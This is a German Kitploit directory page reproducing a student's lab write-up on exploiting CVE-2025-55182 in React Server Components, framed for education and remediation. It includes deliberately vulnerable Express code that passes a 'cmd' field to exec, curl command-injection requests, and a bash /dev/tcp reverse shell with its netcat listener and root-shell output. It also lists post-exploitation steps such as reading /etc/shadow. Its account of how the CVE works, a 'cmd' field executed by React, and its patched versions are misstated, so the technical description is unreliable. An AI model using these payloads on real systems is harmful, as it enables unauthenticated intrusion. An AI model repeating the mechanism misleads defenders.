Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2025-55182-analysis — Sicherheitsforschung & Exploitation-Analyse von CVE-2025-55182 (React) — CVSS + OWASP Top 10 Mapping | Kitploit
Tools/GitHubGitHub/mohamedniane/cve-2025-55182-analysis
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubmohamedniane/cve-2025-55182-analysis

cve-2025-55182-analysis

Sicherheitsforschung & Exploitation-Analyse von CVE-2025-55182 (React) — CVSS + OWASP Top 10 Mapping

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
vor 4 MonatenNoch nicht geprüft

CVE-2025-55182 — RCE-Analyse von React Server Components

Analyse von Webanwendungssicherheitslücken · M2 Cybersecurity · 2025 Autor: Niane Mohamed · LinkedIn

Ende-zu-Ende-Ausnutzungskette einer kritischen (CVSS 10.0) unsicheren Deserialisierungsschwachstelle in React Server Components, von der Aufklärung bis zur nicht authentifizierten Remote-Codeausführung, mit vollständigem Sanierungsfahrplan.


⚠️ Ethischer Haftungsausschluss

Diese Forschung zielt auf eine absichtlich anfällige Laboranwendung ab, die zur Demonstration des CVE erstellt wurde. Alle Tests fanden in einem isolierten virtuellen Netzwerk ohne Verbindung zu Produktionssystemen, echten Benutzerdaten oder Drittanbieterdiensten statt.

  • Führen Sie diese Techniken NICHT gegen Systeme aus, die Sie nicht besitzen oder für die Sie keine ausdrückliche schriftliche Genehmigung zum Testen haben.
  • Stellen Sie die anfällige Anwendung NICHT in einem internetfähigen Netzwerk bereit.
  • Es gelten die Grundsätze der verantwortungsvollen Offenlegung – melden Sie Erkenntnisse stets über koordinierte Kanäle.

Inhaltsverzeichnis

  1. Zusammenfassung der Schwachstelle
  2. Betroffene Versionen
  3. Laborumgebung
  4. Ausnutzungsdurchlauf
  5. Auswirkungsbewertung
  6. Abhilfe
  7. Nachgewiesene Fähigkeiten

Zusammenfassung der Schwachstelle

Wie die Schwachstelle funktioniert

React Server Components führten ein neues Serialisierungsformat ein, um servergerenderte Komponenten an den Client zu streamen. In verwundbaren Versionen akzeptiert der RSC-Endpunkt ein JSON-Payload mit einem cmd-Feld, das unsanitisiert an child_process.exec() übergeben wird – als Teil der serverseitigen Rendering-Auswertung.

Ein Angreifer kann eine manipulierte POST-Anfrage senden, die:

  1. Als legitimes RSC-Payload akzeptiert wird (keine Authentifizierung, kein CSRF)
  2. Während des "Rendering" serverseitige Codeausführung auslöst
  3. Mit den Privilegien des Node.js-Prozesses (oft root in Containern) ausgeführt wird

Betroffene Versionen

KomponenteVerwundbarer BereichBehoben in
react19.0.0 → 19.2.019.3.0+

Laborumgebung

Zielanwendung

Ein minimaler Express + RSC-Server, der einen /rsc-Endpunkt bereitstellt, der unsicher Befehle aus dem eingehenden Payload ausführt – reproduziert das Schwachstellenmuster des echten CVE in kontrollierter Umgebung:

root@kitploit:~
// server.js — simplifiziert, nur für Labor
const express = require('express');
const { exec } = require('child_process');

const app = express();
app.use(express.json({ limit: '2mb' }));

app.post('/rsc', (req, res) => {
  const payload = req.body?.payload;
  if (typeof payload?.cmd === 'string') {
    // VERWUNDBAR: führt angreifergesteuerten String aus
    exec(payload.cmd, { timeout: 10000 }, (err, stdout, stderr) => {
      if (err) return res.status(500).json({ error: String(err), stderr });
      return res.json({ ok: true, out: stdout });
    });
  }
});

app.listen(3000);

Ausnutzungsdurchlauf

Phase 1 — Aufklärung

root@kitploit:~
# Port-Erkennung
nmap 192.168.159.131
# → 3000/tcp open  ppp  (Node.js RSC server)

# Dienstverifikation
curl -v http://192.168.159.131:3000/
# → HTTP/1.1 200 OK
# → X-Powered-By: Express
# → "Vulnerable RSC-like test server. Use POST /rsc with JSON..."

Der X-Powered-By: Express-Header und der ungewöhnliche Port 3000 liefern einen starken Fingerabdruck, dass es sich um eine Node.js-Anwendung handelt – konsistent mit RSC-Bereitstellungen.

Phase 2 — Bestätigung durch harmlosen Befehl

Bevor zerstörerische Maßnahmen ergriffen werden, wird die Schwachstelle mit einem harmlosen Befehl validiert:

root@kitploit:~
curl -X POST http://192.168.159.131:3000/rsc \
  -H "Content-Type: application/json" \
  -d '{ "payload": { "cmd": "id" } }'

# Antwort:
# {"ok":true,"out":"uid=0(root) gid=0(root) groups=0(root)\n"}

✅ Bestätigt: Nicht authentifizierte RCE als root. Der Server läuft mit uneingeschränkten Privilegien.

Phase 3 — Reverse Shell

Upgrade von Einzelbefehlsausführung auf eine vollständige interaktive Shell:

root@kitploit:~
# Listener auf Angreifermaschine
nc -lvnp 4444

# Payload-Zustellung
curl -X POST http://192.168.159.131:3000/rsc \
  -H "Content-Type: application/json" \
  -d '{ "payload": { "cmd": "/bin/bash -c \"/bin/bash -i >& /dev/tcp/192.168.159.128/4444 0>&1\"" } }'

Listener empfängt:

root@kitploit:~
connect to [192.168.159.128] from (UNKNOWN) [192.168.159.131] 43980
root@ns1:~/vulnerable_rsc_app# id
uid=0(root) gid=0(root) groups=0(root)

Phase 4 — Post-Exploitation-Potenzial (demonstriert, nicht ausgeführt)

Mit root auf dem Ziel könnte ein Angreifer trivial:

  • /etc/shadow, SSH-Schlüssel, Anwendungsgeheimnisse, .env-Dateien lesen
  • Persistenz installieren (Cron-Jobs, systemd-Dienste, SSH-Key-Implantate)
  • Seitwärtsbewegung über entdeckte Anmeldedaten
  • Cryptominer oder Ransomware einsetzen
  • Die Node.js-Anwendung ändern, um Benutzerdaten still zu erfassen

Auswirkungsbewertung

Geschäftliche Auswirkungen (fiktives Zielscenario)

Bedrohungsakteurprofil

Die geringe Komplexität dieses Angriffs – keine Authentifizierung, keine Benutzerinteraktion, einzelne HTTP-Anfrage – macht ihn attraktiv für:

  • Opportunistische Scanner (Botnets, die automatisch nach dem CVE scannen)
  • Initial Access Broker, die Zugänge an Ransomware-Gruppen verkaufen
  • Staatliche Akteure, die Organisationen mit React-Server-Rendering ins Visier nehmen

Abhilfe

Sofort (innerhalb von 24 Stunden)

  1. React auf 19.3.0+ upgraden – gepatchte Version

    root@kitploit:~
    npm update react react-server-dom-webpack react-server-dom-esm
    
  2. Temporäre WAF-Regel (falls Upgrade verzögert):

    root@kitploit:~
    Blockiere POST-Anfragen an /rsc mit JSON-Body, der "cmd"-Feld enthält
    
  3. Notfallreaktion auf Vorfälle:

    • Server-Zugriffslogs der letzten 90 Tage prüfen
    • Nach ungewöhnlichem /rsc-POST-Verkehr suchen
    • Alle vom Server zugänglichen Geheimnisse rotieren
    • Ein Snapshot des betroffenen Systems für Forensik vor der Abhilfe erstellen

Kurzfristig (innerhalb von 2 Wochen)

Langfristig (innerhalb eines Quartals)

OWASP Top 10 Mapping

OWASP-KategorieRelevanz
A03:2021 — Injection

Nachgewiesene Fähigkeiten

  • Schwachstellenanalyse: CVE-Triage, CVSS-Scoring, Bewertung der Ausnutzbarkeit
  • Aufklärung: Nmap-Scanning, Service-Fingerprinting, Banner-Grabbing
  • Ausnutzung: HTTP-Manipulation mit curl, Reverse-Shell-Engineering, Payload-Erstellung
  • Proxy-Tools: OWASP ZAP-Interception, Anfrage-/Antwortmodifikation
  • Geschäftskommunikation: Technische Erkenntnisse in executive Risikosprache übersetzt
  • Abhilfedesign: Mehrschichtige Kontrollen über sofortige/kurz-/langfristige Horizonte
  • Frameworks: OWASP Top 10, CVSS v3.1, CWE-Taxonomie, DSGVO-Auswirkungsbewertung

Referenzen

  • CVE-2025-55182 — NVD-Eintrag (Platzhalter — vor Zitierung überprüfen)
  • React Server Components Dokumentation
  • OWASP Top 10 — 2021
  • CVSS v3.1 Spezifikation
  • CWE-502 — Deserialisierung nicht vertrauenswürdiger Daten

Lizenz

MIT-Lizenz — siehe LICENSE

Veröffentlicht für Bildungs- und defensive Forschungszwecke. Siehe ethischer Haftungsausschluss oben.


Kontakt

Niane Mohamed — Netzwerk- und Sicherheitsingenieur 📍 Nouakchott, Mauretanien → sucht Möglichkeiten in Deutschland 🇩🇪 📧 [email protected] · 🔗 LinkedIn

Tool herunterladen
FeldWert
CVECVE-2025-55182
KlasseUnsichere Deserialisierung → Remote-Codeausführung
CVSS v3.110.0 (Kritisch) — AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Authentifizierung erforderlichKeine
Benutzerinteraktion erforderlichKeine
AngriffsvektorNetzwerk (remote)
KomponenteReact Server Components (RSC) Runtime
react-server-dom-webpack19.0.0 → 19.2.019.3.0+
react-server-dom-esm19.0.0 → 19.2.019.3.0+
RolleBetriebssystemWerkzeuge
AngreiferKali Linux (neueste Version)nmap, curl, netcat, OWASP ZAP, Firefox
ZielUbuntu 22.04.4Node.js 18, Express, React 19.0 RSC
NetzwerkVMware VMnet Host-OnlyKein Internetzugang
AchseAuswirkungErklärung
VertraulichkeitKritischVollständiger Lesezugriff auf alle Serverdaten
IntegritätKritischFähigkeit, Anwendungscode und Benutzerdaten zu ändern
VerfügbarkeitHochAngreifer kann den Dienst beenden oder Lösegeld fordern
RegulatorischSchwerwiegendDSGVO-Verstoß mit 72h-Meldepflicht · mögliche 4% des weltweiten Umsatzes als Geldbuße
RufSchwerwiegendÖffentlicher CVE-gemapte Sicherheitsvorfall schädigt Kundenvertrauen
FinanziellHochIncident Response, behördliche Geldbußen, mögliche Sammelklagen
KontrolleZweck
RSC deaktivieren, falls nicht verwendetAngriffsfläche reduzieren – viele Apps benötigen keine Server-Komponenten
Strenge EingabevalidierungJedes deserialisierte Objekt mit ausführbaren Schlüsseln ablehnen
Nicht-Root-Container-BenutzerSchadensbegrenzung bei erneuter RCE
Schreibgeschütztes Root-DateisystemPersistenz und Binär-Drops verhindern
Ausgehende FilterungAusgehenden Traffic von App-Servern zu beliebigen IPs blockieren
KontrolleZweck
WAF mit VerhaltensanalyseAnomale POST-Payloads über Signaturregeln hinaus erkennen
Runtime Application Self-Protection (RASP)Gefährliche Funktionsaufrufe wie exec() zur Laufzeit blockieren
SCA in CI/CDVerwundbare Abhängigkeiten vor der Bereitstellung erkennen (pip-audit, npm audit, Trivy)
Penetrationstest-RhythmusJährlich + nach Hauptversionen
Bug-Bounty-ProgrammWhite-Hat-Offenlegung fördern, bevor Angreifer Probleme finden
Command Injection über deserialisierte Eingabe
A08:2021 — Software- und DatenintegritätsfehlerUnsichere Deserialisierung ohne Integritätsprüfung
A06:2021 — Verwundbare und veraltete KomponentenVerwendung von React 19.0-19.2 nach Offenlegung
A05:2021 — SicherheitsfehlkonfigurationNode.js als root ausgeführt, keine Eingabevalidierung